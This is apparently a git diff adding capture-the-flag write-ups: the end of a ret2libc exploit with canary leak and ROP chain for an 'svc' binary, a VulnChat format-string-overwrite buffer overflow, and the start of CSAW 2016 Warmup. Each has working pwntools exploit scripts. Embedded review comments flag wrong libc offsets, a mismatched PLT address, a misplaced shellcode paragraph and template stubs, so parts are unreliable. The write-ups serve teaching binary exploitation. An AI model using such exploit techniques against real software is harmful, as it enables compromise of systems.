+ 0x00007ffff7c16000 0x00007ffff7d62000 0x0000000000026000 r-x /usr/lib/libc-2.33.so
+ 0x00007ffff7d62000 0x00007ffff7dae000 0x0000000000172000 r-- /usr/lib/libc-2.33.so
+ 0x00007ffff7dae000 0x00007ffff7db1000 0x00000000001bd000 r-- /usr/lib/libc-2.33.so
+ 0x00007ffff7db1000 0x00007ffff7db4000 0x00000000001c0000 rw- /usr/lib/libc-2.33.so
+ 0x00007ffff7db4000 0x00007ffff7dbd000 0x0000000000000000 rw-
+
+ 0x00007ffff7dbd000 0x00007ffff7e53000 0x0000000000000000 r-- /usr/lib/libstdc++.so.6.0.28
+ 0x00007ffff7e53000 0x00007ffff7f3f000 0x0000000000096000 r-x /usr/lib/libstdc++.so.6.0.28
+ 0x00007ffff7f3f000 0x00007ffff7f88000 0x0000000000182000 r-- /usr/lib/libstdc++.so.6.0.28
+ 0x00007ffff7f88000 0x00007ffff7f89000 0x00000000001cb000 --- /usr/lib/libstdc++.so.6.0.28
+ 0x00007ffff7f89000 0x00007ffff7f96000 0x00000000001cb000 r-- /usr/lib/libstdc++.so.6.0.28
+ 0x00007ffff7f96000 0x00007ffff7f97000 0x00000000001d8000 rw- /usr/lib/libstdc++.so.6.0.28
+ 0x00007ffff7f97000 0x00007ffff7f9c000 0x0000000000000000 rw-
+ 0x00007ffff7fc6000 0x00007ffff7fca000 0x0000000000000000 r-- [vvar]
+ 0x00007ffff7fca000 0x00007ffff7fcc000 0x0000000000000000 r-x [vdso]
+ 0x00007ffff7fcc000 0x00007ffff7fcd000 0x0000000000000000 r-- /usr/lib/ld-2.33.so
+ 0x00007ffff7fcd000 0x00007ffff7ff1000 0x0000000000001000 r-x /usr/lib/ld-2.33.so
+ 0x00007ffff7ff1000 0x00007ffff7ffa000 0x0000000000025000 r-- /usr/lib/ld-2.33.so
+ 0x00007ffff7ffb000 0x00007ffff7ffd000 0x000000000002e000 r-- /usr/lib/ld-2.33.so
+ 0x00007ffff7ffd000 0x00007ffff7fff000 0x0000000000030000 rw- /usr/lib/ld-2.33.so
+ 0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
+ 0xffffffffff600000 0xffffffffff601000 0x0000000000000000 --x [vsyscall]
+
+
+
+Here we want to break ASLR in the **libc-2.23.so** region where we have read and write permissions, therefore at **00007ffff7bf0000**.
+
+To do the puts function infoleak, we will need 3 things. The plt address of **puts** (address of the imported function which we will use to call it), the address of the got entry of **puts** which holds the libc address, and a **rop gadget** to pop the got entry into the rdi register, and then return.
+
+Since the puts call expects it's input (a single char pointer) in the rdi register, that is where we need to place it. To find the **plt** and **got** addresses, we can use pwntools:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/1 ] [binexp/2/svc]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> from pwn import *
+ >>> elf = ELF('svc')
+ [*] '/home/nothing/binexp/2/svc/svc'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+ >>> print("plt addr:" + hex(elf.symbols['puts']))
+ plt addr:0x4008d0
+ >>> print("got addr:" + hex(elf.got['puts']))
+ got addr:0x602018
+
+
+
+To find the gadget we need, let's use [ROPGadget](https://github.com/JonathanSalwan/ROPgadget) like we used in the previous challenges already
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/1 ] [binexp/2/svc]
+ → ROPgadget --binary svc| grep "pop rdi"
+ 0x0000000000400ea3 : pop rdi ; ret
+
+
+
+The last mitigation we will overcome is the NX (Non executable stack), this means that the stack does not have the execute permission. SO we cannot execute code on the stack. Our method to bypass this will have to be a mix of a ROP chain, and a ret2libc (return to libc) attack. ROP is when we take bits of code that already are in the binary and make them work together in the manner that we want.
+
+What we need here is to use ROP Gadgets, which are essentially pointers to the bits of code that end in a **ret** instruction which will make it move to the next gadget. Since these are all valid instruction pointers to code that should run, it will be markeed as executable regardless of the NX.
+
+
+ gef➤ p puts
+ $1 = {<****text variable, no debug info>} 0x7ffff7c66cd0
+ gef➤ p system
+ $2 = {<****text variable, no debug info>} 0x7ffff7c3a120
+ gef➤ search-pattern /bin/sh
+ [+] Searching '/bin/sh' in memory
+ [+] In '/usr/lib/libc-2.33.so'(0x7ffff7d62000-0x7ffff7dae000), permission=r--
+ 0x7ffff7d7c966 - 0x7ffff7d7c96d → "/bin/sh"
+
+
+
+We calculate the offsets:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [blog/binexp/2]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0x7ffff7c66cd0 - 0x00007ffff7d62000 )
+ '-0xfb330'
+ >>> hex( 0x7ffff7c3a120 - 0x00007ffff7d62000 )
+ '-0x127ee0'
+ >>> hex( 0x7ffff7d7c966 - 0x00007ffff7d62000 )
+ '0x1a966'
+
+
+
+and with this we can create the exploit:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process("./svc")
+ gdb.attach(target)
+
+ elf = ELF('svc')
+
+
+ # 0x0000000000400ea3 : pop rdi ; ret
+ popRdi = p64(0x400ea3)
+
+ gotPuts = p64(0x602018)
+ pltPuts = p64(0x4008cc)
+
+ offsetPuts = 0xfb330
+ offsetSystem = 0x127ee0
+ offsetBinsh = 0x1a966
+
+ startMain = p64(0x400a96)
+
+ # Establish fucntions to handle I/O with the target
+ def feed(data):
+ print(target.recvuntil(">>"))
+ target.sendline(b'1')
+ print(target.recvuntil(">>"))
+ target.send(data)
+
+ def review():
+ print(target.recvuntil(">>"))
+ target.sendline(b'2')
+ #print target.recvuntil("[*]PLEASE TREAT HIM WELL.....\n-------------------------\n")
+ #leak = target.recvuntil("-------------------------").replace("-------------------------", "")
+ print(target.recvuntil(b"0"*0xa9))
+ canaryLeak = target.recv(7)
+ canary = u64(b"\x00" + canaryLeak)
+ print("canary is: " + hex(canary))
+ return canary
+
+ def leave():
+ print(target.recvuntil(">>"))
+ target.sendline(b"3")
+
+ # Start of with the canary leak. We will overflow the buffer write up to the stack canary, and overwrite the least signifcant byte of the canary
+ leakCanary = b""
+ leakCanary += b"0"*0xa8 # Fill up space up to the canary
+ leakCanary += b"0" # Overwrite least significant byte of the canary
+
+
+
+ feed(leakCanary) # Execute the overwrite
+
+ canary = review() # Leak the canary, and parse it out
+
+ # Start the rop chain to give us a libc infoleak
+ leakLibc = b""
+ leakLibc += b"0"*0xa8 # Fill up space up to the canary
+ leakLibc += p64(canary) # Overwrite the stack canary with itself
+ leakLibc += b"1"*0x8 # 8 more bytes until the return address
+ leakLibc += popRdi # Pop got entry for puts in rdi register
+ leakLibc += gotPuts # GOT address of puts
+ leakLibc += pltPuts # PLT address of puts
+ leakLibc += startMain # Loop back around to the start of main
+
+ # Send the payload to leak libc
+ feed(leakLibc)
+
+ # Return to execute our code
+ leave()
+
+ # Scan in and parse out the infoleak
+
+ print(target.recvuntil("[*]BYE ~ TIME TO MINE MIENRALS...\x0a"))
+
+ putsLeak = target.recvline().replace(b"\x0a", b"")
+
+ putsLibc = u64(putsLeak + b"\x00"*(8-len(putsLeak)))
+
+ # Calculate the needed addresses
+
+ libcBase = putsLibc - offsetPuts
+ systemLibc = libcBase + offsetSystem
+ binshLibc = libcBase + offsetBinsh
+
+ print("libc base: " + hex(libcBase))
+
+ # Form the payload to return to system
+
+ payload = b""
+ payload += b"0"*0xa8
+ payload += p64(canary)
+ payload += b"1"*0x8
+ payload += popRdi # Pop "/bin/sh" into the rdi register, where it expects it's argument (single char pointer)
+ payload += p64(binshLibc) # Address to '/bin/sh'
+ payload += p64(systemLibc) # Libc address of system
+
+ # Send the final payload
+ feed(payload)
+
+ target.sendline(b"3")
+
+ #feed(payload)
+
+ # Return to execute our code, return to system and get a shell
+ #leave()
+
+ target.interactive()
+
+
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
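Review bot: The libc offsets in the exploit script are measured from the wrong reference point and with the wrong sign, so `systemLibc` will not land on `system`. In the python session the three deltas are taken against `0x00007ffff7d62000`, which the vmmap output shows is the `r--` data mapping of libc-2.33.so at file offset `0x172000`, not the start of the library (`0x00007ffff7bf0000`, offset 0); that is why `puts` and `system` come out negative (`'-0xfb330'`, `'-0x127ee0'`) while `/bin/sh` comes out positive (`'0x1a966'`). The script then stores all three as positive magnitudes and computes `libcBase = putsLibc - offsetPuts` followed by `systemLibc = libcBase + offsetSystem`, which is only valid when every offset is a positive distance above one common base. Measuring from the mapping base instead gives puts = 0x76cd0, system = 0x4a120 and "/bin/sh" = 0x18c966 (all positive), and the arithmetic in the script becomes correct; better still, load the library with `ELF('/usr/lib/libc-2.33.so')` and take `libc.symbols['puts']`, `libc.symbols['system']` and `next(libc.search(b'/bin/sh'))` so no constant is copied by hand. Two smaller consistency points in the same hunk: pwntools prints `plt addr:0x4008d0` but the script hardcodes `pltPuts = p64(0x4008cc)` (use `elf.plt['puts']` from the `ELF('svc')` that is already loaded so the two cannot drift apart), and the prose says the overflow exists "because of a gets() call" and that we break ASLR in "libc-2.23.so ... where we have read and write permissions", whereas the disassembly above shows a `read()` of 0xf8 bytes and vmmap shows libc-2.33.so with `0x7ffff7bf0000` being its `r--` base mapping, which is what the leak is actually computed against.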
diff --git a/2/vuln.md b/2/vuln.md
new file mode 100644
index 0000000..5ea1ecd
--- /dev/null
+++ b/2/vuln.md
@@ -0,0 +1,421 @@
+# TUCTF 2017 VulnChat
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/3 ] [binexp/2/vulnchat]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/05-bof_callfunction/tu17_vulnchat/vuln-chat
+ --2021-03-01 09:42:07-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/05-bof_callfunction/tu17_vulnchat/vuln-chat
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/05-bof_callfunction/tu17_vulnchat/vuln-chat [following]
+ --2021-03-01 09:42:08-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/05-bof_callfunction/tu17_vulnchat/vuln-chat
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.110.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 6092 (5.9K) [application/octet-stream]
+ Saving to: ‘vuln-chat’
+
+ vuln-chat 100%[================================================================>] 5.95K --.-KB/s in 0s
+
+ 2021-03-01 09:42:08 (30.0 MB/s) - ‘vuln-chat’ saved [6092/6092]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/3 ] [binexp/2/vulnchat]
+ → file vuln-chat
+ vuln-chat: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a3caa1805eeeee1454ee76287be398b12b5fa2b7, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/3 ] [binexp/2/vulnchat]
+ → chmod +x vuln-chat
+
+
+
+` ![]()
+
+## Solution
+
+First step is to execute the binary to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/3 ] [binexp/2/vulnchat]
+ → ./vuln-chat
+ ----------- Welcome to vuln-chat -------------
+ Enter your username: nothing
+ Welcome nothing!
+ Connecting to 'djinn'
+ --- 'djinn' has joined your chat ---
+ djinn: I have the information. But how do I know I can trust you?
+ nothing: you can't lol
+ djinn: Sorry. That's not good enough
+
+
+
+Let's inspect it in ghidra:
+
+
+
+Which gives us the following code:
+
+
+ undefined4 main(void)
+
+ {
+ undefined local_31 [20];
+ undefined local_1d [20];
+ undefined4 local_9;
+ undefined local_5;
+
+ setvbuf(stdout,(char *)0x0,2,0x14);
+ puts("----------- Welcome to vuln-chat -------------");
+ printf("Enter your username: ");
+ local_9 = 0x73303325;
+ local_5 = 0;
+ __isoc99_scanf(&local;_9,local_1d);
+ printf("Welcome %s!\n",local_1d);
+ puts("Connecting to \'djinn\'");
+ sleep(1);
+ puts("--- \'djinn\' has joined your chat ---");
+ puts("djinn: I have the information. But how do I know I can trust you?");
+ printf("%s: ",local_1d);
+ __isoc99_scanf(&local;_9,local_31);
+ puts("djinn: Sorry. That\'s not good enough");
+ fflush(stdout);
+ return 0;
+ }
+
+
+
+Here we see that first we get asked for our username, and then our input text gets put into local_1d (20 bytes) and then there is another scanf which puts our input text into local_31 (20 bytes aswell). For both scanf there is another variable being used called '&local;_9' this is a format specifier whcich is stored on the stack:
+
+
+
+
+ 080485be c7 45 fb MOV dword ptr [EBP + local_9],0x73303325
+ 25 33 30 73
+
+
+
+here we see that an address is being called '0x73303325', and to see what it is we can just click on it and wait for ghidra to show us what it is:
+
+
+
+
+ s03%
+
+
+
+since we are dealing with a 32bit LSB executable, this is written in little endian (reverse or least important byte first) we get the following:
+
+
+ %30s
+
+
+so now we know that both scanf functions take our input characters with '%30s' or '30 characters'. So let's take a look at the stack layout from ghidra:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main()
+ undefined AL:1
+ undefined1 Stack[-0x5]:1 local_5 XREF[1]: 080485c5(W)
+ undefined4 Stack[-0x9]:4 local_9 XREF[3]: 080485be(W),
+ 080485cd(*),
+ 08048630(*)
+ undefined1 Stack[-0x1d]:1 local_1d XREF[3]: 080485c9(*),
+ 080485d9(*),
+ 0804861b(*)
+ undefined1 Stack[-0x31]:1 local_31 XREF[1]: 0804862c(*)
+ main XREF[4]: Entry Point(*),
+ _start:08048487(*), 08048830,
+ 080488ac(*)
+ 0804858a 55 PUSH EBP
+
+
+
+Now the second time we are prompted for text, the text gets stored into local_31 located at -0x31, the first time we get prompted for text, the text gets stored in local_1d at -0x1d. Therefore local_31 can hold 0x31 - 0x1d bytes:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [~]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex(0x31 - 0x1d)
+ '0x14'
+
+
+now that we know that local_31 can hold 14 bytes, let's see how much the local_1d variable hold aswell: 0x1d - 0x9
+
+
+ >>> hex(0x1d - 0x9)
+ '0x14'
+
+
+So both local_31 and local_1d can hold 14 bytes respectively. And since we can scan in 30 bytes of data, that gives us 16 bytes to overflow with (or 0x10 bytes)
+
+The idea here is to first overflow with local_1d to overflow to the value of local_9 (where the %30s is written in little endian as we saw earlier). Then we will be able to specify how much data the second scanf call will scan. And with that we will be able to scan in more than enough data to overwrite the saved return address to get code execution when the ret instruction executes. Now let's check if there is a flag function in ghidra:
+
+
+
+
+ void printFlag(void)
+
+ {
+ system("/bin/cat ./flag.txt");
+ puts("Use it wisely");
+ return;
+ }
+
+
+Now with all of that, let's look at how the memory is corrupted during the exploit. First we set a breakpoint right after the second scanf call at '0x08048639':
+
+
+ 08048634 e8 27 fe CALL __isoc99_scanf undefined __isoc99_scanf()
+ ff ff
+ 08048639 83 c4 08 ADD ESP,0x8
+
+
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/52 ] [binexp/2/vulnchat]
+ → gdb ./vuln-chat
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./vuln-chat...
+ (No debugging symbols found in ./vuln-chat)
+ gef➤ b *0x8048639
+ Breakpoint 1 at 0x8048639
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/vulnchat/vuln-chat
+ ----------- Welcome to vuln-chat -------------
+ Enter your username: 321654987
+ Welcome 321654987!
+ Connecting to 'djinn'
+ --- 'djinn' has joined your chat ---
+ djinn: I have the information. But how do I know I can trust you?
+ 321654987: 987654321
+
+ Breakpoint 1, 0x08048639 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $eax : 0x1
+ $ebx : 0x0
+ $ecx : 0xffffd090 → 0xf7f90540 → 0xfbad2288
+ $edx : 0xf7f8fe1c → 0x001eed2c
+ $esp : 0xffffd0b0 → 0xffffd0e3 → "%30s"
+ $ebp : 0xffffd0e8 → 0x00000000
+ $esi : 0x1
+ $edi : 0x08048470 → <_start+0> xor ebp, ebp
+ $eip : 0x08048639 → add esp, 0x8
+ $eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0xffffd0b0│+0x0000: 0xffffd0e3 → "%30s" ← $esp
+ 0xffffd0b4│+0x0004: 0xffffd0bb → "987654321"
+ 0xffffd0b8│+0x0008: 0x39049a10
+ 0xffffd0bc│+0x000c: "87654321"
+ 0xffffd0c0│+0x0010: "4321"
+ 0xffffd0c4│+0x0014: 0xffffd100 → 0xffffd134 → 0x67db6985
+ 0xffffd0c8│+0x0018: 0xffffd19c → 0xffffd371 → "ALACRITTY_LOG=/tmp/Alacritty-3896966.log"
+ 0xffffd0cc│+0x001c: 0x31dd8c99
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+ 0x8048630 lea eax, [ebp-0x5]
+ 0x8048633 push eax
+ 0x8048634 call 0x8048460 <__isoc99_scanf@plt>
+ ●→ 0x8048639 add esp, 0x8
+ 0x804863c push 0x80487ec
+ 0x8048641 call 0x8048410
+ 0x8048646 add esp, 0x4
+ 0x8048649 mov eax, ds:0x8049a60
+ 0x804864e push eax
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "vuln-chat", stopped 0x8048639 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x8048639 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+now from here we first set the breakpoint, then ran the binary, then entered the first scanf where we put the '321654987' pattern, and then entered the second scanf where we put the '987654321' pattern, and then we hit the breakpoint we set. Now we want to inspect what happened to our second text input, the pattern '987654321' so we search the pattern in the memory:
+
+
+ gef➤ search-pattern 987654321
+ [+] Searching '987654321' in memory
+ [+] In '[heap]'(0x804a000-0x806c000), permission=rw-
+ 0x804a1a0 - 0x804a1ab → "987654321\n"
+ [+] In '[stack]'(0xfffdd000-0xffffe000), permission=rw-
+ 0xffffd0bb - 0xffffd0c4 → "987654321"
+
+
+
+Now we know that our second text input pattern is at **0xffffd0bb** let's search for the pattern '%30s':
+
+
+ gef➤ search-pattern %30s
+ [+] Searching '%30s' in memory
+ [+] In '/home/nothing/binexp/2/vulnchat/vuln-chat'(0x8048000-0x8049000), permission=r-x
+ 0x80485c1 - 0x80485c5 → "%30s[...]"
+ [+] In '/home/nothing/binexp/2/vulnchat/vuln-chat'(0x8049000-0x804a000), permission=rw-
+ 0x80495c1 - 0x80495c5 → "%30s[...]"
+ [+] In '[stack]'(0xfffdd000-0xffffe000), permission=rw-
+ 0xffffd0e3 - 0xffffd0e7 → "%30s"
+
+
+
+Now we know that the format string is stored at**0xffffd0e3** so let's see where our first input text is with the pattern 321654987:
+
+
+ gef➤ search-pattern 321654987
+ [+] Searching '321654987' in memory
+ [+] In '[stack]'(0xfffdd000-0xffffe000), permission=rw-
+ 0xffffb06c - 0xffffb086 → "321654987: 654987!\nname: "
+ 0xffffd0cf - 0xffffd0d8 → "321654987"
+
+
+
+so now we know that our first text pattern (321654987) is located at **0xffffd0cf** so let's calculate the offset:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/54 ] [binexp/2/vulnchat]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex(0xffffd0e3 - 0xffffd0cf )
+ '0x14'
+
+
+
+so now we know that our first input text (321654987) is 0x14 bytes (or 20 bytes) away from the format string variable value '%30s', our second input begins at **0xffffd0bb** , but we need to know where the return address is and what the offset between our second input and the return address is:
+
+
+ gef➤ x/14x 0xffffd0bb
+ 0xffffd0bb: 0x36373839 0x32333435 0xffd10031 0xffd19cff
+ 0xffffd0cb: 0xdd8c99ff 0x34333231 0x38373635 0x04860039
+ 0xffffd0db: 0x00000008 0x00000100 0x73303325 0x00000000
+ 0xffffd0eb: 0xdbfa0d00 0x000001f7
+
+ gef➤ i f
+ Stack level 0, frame at 0xffffd0f0:
+ eip = 0x8048639 in main; saved eip = 0xf7dbfa0d
+ Arglist at 0xffffd0e8, args:
+ Locals at 0xffffd0e8, Previous frame's sp is 0xffffd0f0
+ Saved registers:
+ ebp at 0xffffd0e8, eip at 0xffffd0ec
+
+
+
+
+Here we see that the return address is at **0xffffd0ec** so we calculate the offset between our second input **0xffffd0bb** and the return address:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/54 ] [binexp/2/vulnchat]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex(0xffffd0ec - 0xffffd0bb)
+ '0x31'
+
+
+
+So there is exactly 31 bytes between the second input and the return address, so this is a hint that the default 30 bytes of second input will not be able to reach it, that's why the first input is there to reach the %30s value beforehand to change it. From here we can make the following exploit:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/54 ] [binexp/2/vulnchat]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process ('./vuln-chat')
+
+ #print the initial text
+ print(target.recvuntil("username: "))
+
+
+ #form the first payload to overwrite the %30s value
+ payload0 = b""
+ payload0 += b"\x00" * 0x14 #fill up the space with 0x14 nullbytes until the %30s format string value
+ payload0 += b"%99s" #overwrite %30s with %99s
+
+ #send the first payload through the first scanf
+ #print(payload0)
+ target.sendline(payload0)
+
+ # Print the text up to the second scanf call
+ print(target.recvuntil("I know I can trust you?"))
+
+
+ #write the second payload to overwrite the return address with the print_flag function address
+ payload1 = b""
+ payload1 += b"\x00" * 0x31 #fill up the space until the return address with (0x31 nullbytes)
+ payload1 += p32(0x804856b) #write the address of print_flag in little endian 32 bits
+
+ #send the second payload through the second scanf
+ #print(payload1)
+ target.sendline(payload1)
+
+ #drop into an interactive shell to view the rest of the output
+ target.interactive()
+
+
+
+The plan here is to first push shellcode onto the stack, and we know where it is thanks to the memory address that's given to us, then we fill the gap with nullbytes, and then overwrite the return address to point to the start of our shellcode
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/55 ] [binexp/2/vulnchat]
+ → python3 exploit.py
+ [+] Starting local process './vuln-chat': pid 2786552
+ b'----------- Welcome to vuln-chat -------------\nEnter your username: '
+ b"Welcome !\nConnecting to 'djinn'\n--- 'djinn' has joined your chat ---\ndjinn: I have the information. But how do I know I can trust you?"
+ [*] Switching to interactive mode
+
+ : djinn: Sorry. That's not good enough
+ flag{g0ttem_b0yz}
+ Use it wisely
+ [*] Got EOF while reading in interactive
+ $
+
+
+And our exploit worked! We have been able to print the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
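Review bot: the paragraph after the exploit ("The plan here is to first push shellcode onto the stack, and we know where it is thanks to the memory address that's given to us ...") describes a different exploit than the one in exploit.py: this script injects no shellcode and simply overwrites the saved return address with the address of print_flag (`payload1 += p32(0x804856b)`), so the paragraph looks pasted from another writeup and should be replaced with a sentence that matches the script. The offset is also stated inconsistently: the text says "exactly 31 bytes between the second input and the return address" while the payload pads with `b"\x00" * 0x31`, i.e. 49 bytes; since 0x31 is what is actually sent and what the `%30s` limit cannot reach, the prose should say 0x31 (49) bytes. The two "## Title / text / ` ![]()" sections at the end of the file are unfilled template stubs and should be dropped before merge.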
diff --git a/2/warm.md b/2/warm.md
new file mode 100644
index 0000000..9d85b53
--- /dev/null
+++ b/2/warm.md
@@ -0,0 +1,320 @@
+# CSAW 2016 Warmup
+
+## Downloading the binary file:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/warmup]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/05-bof_callfunction/csaw16_warmup/warmup
+ --2021-02-27 11:02:37-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/05-bof_callfunction/csaw16_warmup/warmup
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/05-bof_callfunction/csaw16_warmup/warmup [following]
+ --2021-02-27 11:02:38-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/05-bof_callfunction/csaw16_warmup/warmup
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.109.133, 185.199.111.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 8705 (8.5K) [application/octet-stream]
+ Saving to: ‘warmup’
+
+ warmup 100%[=======================================================================================================================================================================================================>] 8.50K --.-KB/s in 0.001s
+
+ 2021-02-27 11:02:38 (7.11 MB/s) - ‘warmup’ saved [8705/8705]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/warmup]
+ → file warmup
+ warmup: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=ab209f3b8a3c2902e1a2ecd5bb06e258b45605a4, not stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/warmup]
+ → chmod +x warmup
+
+
+` ![]()
+
+## Solution
+
+first of all let's see what we get when we run the binary file:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/warmup]
+ → ./warmup
+ -Warm Up-
+ WOW:0x40060d
+ >something
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/warmup]
+ → ./warmup
+ -Warm Up-
+ WOW:0x40060d
+ >something2
+
+
+
+First there is some text getting displayed, we get an address '0x40060d', then we get prompted for text input and nothing after that. So let's check what the binary file looks like in ghidra:
+
+
+
+
+ void main(void)
+
+ {
+ char local_88 [64];
+ char local_48 [64];
+
+ write(1,"-Warm Up-\n",10);
+ write(1,&DAT;_0040074c,4);
+ sprintf(local_88,"%p\n",easy);
+ write(1,local_88,9);
+ write(1,&DAT;_00400755,1);
+ gets(local_48);
+ return;
+ }
+
+
+
+Here we see the main function disassembled code, which is rather simplistic, we also see that our input text gets put into the local_48 variable at -0x48 on the stack:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main()
+ undefined AL:1
+ undefined1 Stack[-0x48]:1 local_48 XREF[1]: 00400692(*)
+ undefined1 Stack[-0x88]:1 local_88 XREF[2]: 0040064d(*),
+ 00400668(*)
+ main XREF[5]: Entry Point(*),
+ _start:0040053d(*),
+ _start:0040053d(*), 0040077c,
+ 00400830(*)
+ 0040061d 55 PUSH RBP
+
+
+
+However most importantly, we see that the address being printed is the address of the function called 'easy' at 0x40060d
+
+
+
+this function is supposed to print the contents of flag.txt for us. Now before that, in the main function we see that our local_48 input text variable gets passed through a 'gets' function, this is a bug because it does not limit how much data it scans in. We also see the following:
+
+
+
+ void main(void)
+
+ {
+ char local_88 [64];
+ char local_48 [64];
+
+
+
+our local input variable (local_48) can only hold 64 bytes of data, after we write those 64 bytes of data, we overflow the buffer and start overwriting other things in memory. With this bug we can reach the return address (the address after the ret call) and with this we want to make use of the 'easy function to print us the flag. so let's use gdb to see how much data we need to send BEFORE overwriting the return address:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/warmup]
+ → gdb warmup
+
+ GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
+ Copyright (C) 2021 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
